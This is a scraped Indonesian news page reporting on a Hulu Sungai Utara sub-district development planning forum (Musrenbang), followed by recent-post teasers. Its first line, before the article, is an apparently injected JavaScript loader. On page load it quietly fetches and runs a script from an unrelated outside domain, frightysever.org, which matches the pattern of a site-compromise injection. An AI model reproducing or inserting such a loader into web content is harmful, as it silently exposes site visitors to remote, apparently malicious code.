(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
Kabupaten Hulu Sungai Utara

Musrenbang Kecamatan Sungai Tabukan dan Sungai Pandan, Ini Kata Pj Bupati HSU


KANALKALIMANTAN.COM, AMUNTAI – Penjabat (Pj) Bupati Hulu Sungai Utara (HSU) Zakly Asswan membuka secara resmi Musyawarah Perencanaan Pembangunan (Musrenbang) Kecamatan Sungai Tabukan dan Kecamatan Sungai Pandan Rencana Kerja Pemerintah Daerah (RKPD) Kabupaten HSU tahun 2025.

Kegiatan yang digelar di gedung serba guna Kecamatan Sungai Tabukan, Senin (18/3/2024) dihadiri unsur Muspika, anggota DPRD HSU, TNI, Polri, para kepala desa, serta tokoh masyarakat.

Pj Bupati HSU Zakly Asswan mengatakan bahwa kegiatan ini sangat penting dalam menentukan arah pembangunan yang akan datang.

“Kegiatan ini emang setiap tahun kita laksanakan, sudah seharusnya saat bikin program, konsep masterplannya tidak hanya untuk jangka pendek tetapi harus untuk jangka panjang juga, artinya desain kita berapa luas wilayahnya, berapa jumlah masyarakatnya, apa kebutuhan kita dibikin semua, lalu sekala prioritasnya itu apa, jadi setiap tahun ada program baru,” kata Zakly.

Baca juga: Ketika Satpol PP Banjarbaru Mengatur Khusus Warung Makan saat Ramadan

Zakly menekankan, agar program prioritas pembangunan di desa atau kecamatan nantinya dapat berkelanjutan ke program prioritas lainnya, sehingga tidak itu-itu saja.

“Jika ada pembangunan itu-itu saja, keinginan kita seharusnya jika pembangunan ini selesai, baru yang lain lagi,” imbuhnya.

Sementara itu, Plt Camat Sungai Tabukan Fahriadi mengatakan bahwa dalam kegiatan ini masyarakat mengusulkan beberapa program pembangunan khusus pembangunan fisik.

“Sebelumnya telah dilaksanakan musyawarah desa di 17 desa se Kecamatan Sungai Tabukan, dari kegiatan musyawarah desa tersebut ada terhimpun 36 usulan,” katanya.

Baca juga: Korupsi Proyek Jamban Desa, Mantan Kades Diganjar 21 Bulan Penjara

Musrenbang kecamatan membahas dan menindaklanjuti langkah-langkah dalam penanganan program prioritas dan perencanaan pembangunan desa yang terintegrasi dengan prioritas pembangunan di Kabupaten HSU, khususnya untuk wilayah kecamatan Sungai Tabukan dan Kecamatan Sungai Pandan.

Fahriadi berharap semua usulan masyarakat tersebut dapat ditindaklanjuti oleh SKPD terkait, karena usulan tersebut menjadi prioritas di tiap-tiap desa sesuai dengan kondisi di lapangan.

Adapun beberapa usulan tersebut diantaranya meliputi, infrastruktur, irigasi, saran prasarana umum, normalisasi sungai, hingga sarana prasarana pendidikan. (Kanalkalimantan.com/dew)

Reporter: dew
Editor: bie


Risa

Recent Posts

Hidup Makin Tenang, Hadapi Risiko dengan Asuransi Pelita dari BRI Life

KANALKALIMANTAN.COM, - Asuransi merupakan salah satu bentuk perlindungan yang perlu dimiliki setiap orang. Dengan memiliki… Read More

12 jam ago

10 Mei Hari Lupus Sedunia, Yuk Kenali Penyakit Lupus

KANALKALIMANTAN.COM - Peringatan Hari Lupus Sedunia ini diadakan pada tanggal 10 Mei setiap tahunnya. Hari… Read More

12 jam ago

Teror Buaya Muara di Pelambuan, Warga Diminta Jauhi Sungai

KANALKALIMANTAN.COM, BANJARMASIN - Buaya yang kerap muncul di Sungai Pelambuan, Kecamatan Banjarmasin Barat, Kota Banjarmasin,… Read More

12 jam ago

Satgas Distribusi Material ke Lokasi TMMD Desa Sungai Karias

KANALKALIMANTAN.COM, AMUNTAI - Pelaksaanan program TNI Manunggal Membangun Desa (TMMD) ke-120 Kodim 1001/HSU-BLG di Desa… Read More

16 jam ago

Yakin ‘Pemilik’ 13 Kursi Golkar, Acil Odah Lamar Nasdem Koalisi di Pilgub Kalsel

KANALKALIMANTAN.COM, BANJARBARU - Hj Raudatul Jannah atau Acil Odah siap ramaikan kontestasi Pemilihan Kepala Daerah… Read More

18 jam ago

Musrenbang RPJPD 2025-2045, Bahas Rencana Program HSU 20 Tahun ke Depan

KANALKALIMANTAN.COM, AMUNTAI - Pemerintah Kabupaten Hulu Sungai Utara melaksanakan Musyawarah Perencanaan Pembangunan (Musrenbang) Rencana Pembangunan… Read More

19 jam ago

This website uses cookies.